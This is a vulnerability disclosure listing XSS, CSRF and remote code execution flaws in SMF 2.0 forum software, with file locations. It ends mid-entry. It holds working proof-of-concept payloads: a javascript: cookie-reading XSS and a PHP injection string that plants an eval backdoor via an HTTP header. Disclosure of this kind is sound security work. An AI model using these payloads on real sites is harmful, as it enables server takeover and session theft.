This is the first batch of vulnerabilities found by the SimpleAudit team from elhacker.net http://labs.elhacker.net/simpleaudit Our goal is to evaluate the security of SMF 2.0 before using it on our own server, and we have found several security vulnerabilities. The vulnerabilities that also apply to SMF 1.1.10 were fixed by the SMF team today, on SMF 1.1.11 visit simplemachines.org for details. You can review the list of the published vulnerabilities in: http://code.google.com/p/smf2-review/issues/list Description: XSS in 'website' field in User Profile Discovered by: WHK@elhacker.net Vulnerable code: Sources/Profile-Modify.php:802 Vulnerable URL: N/A PoC: javascript:alert(document.cookie);//http://xx Description: PHP Remote Code Execution Discovered by: WHK@elhacker.net Vulnerable code: Sources/ManageServer.php:1409 Vulnerable URL: Themes/default/languages/index.english.php PoC: en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} // Description:CSRF theme change Discovered by: WHK@elhacker.net Vulnerable code: Sources/Load.php#1245 Vulnerable URL: index.php?theme=2 PoC: N/A Description: Subforum Category Collapse CSRF Discovered by: WHK@elhacker.net Vulnerable code: Sources/BoardIndex.php:130 Vulnerable URL: index.php?action=collapse;c=1;sa=collapse PoC: N/A Description: CSRF in package server manager Discovered by: WHK@elhacker.net Vulnerable code: Sources/Packages.php#1189 Vulnerable URL: http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1 PoC: N/A Description: XSS in package server manager Discovered by: WHK@elhacker.net Vulnerable code: Sources/PackageGet.php#732 Vulnerable URL: index.php?action=packageget PoC: "Add server" => Name: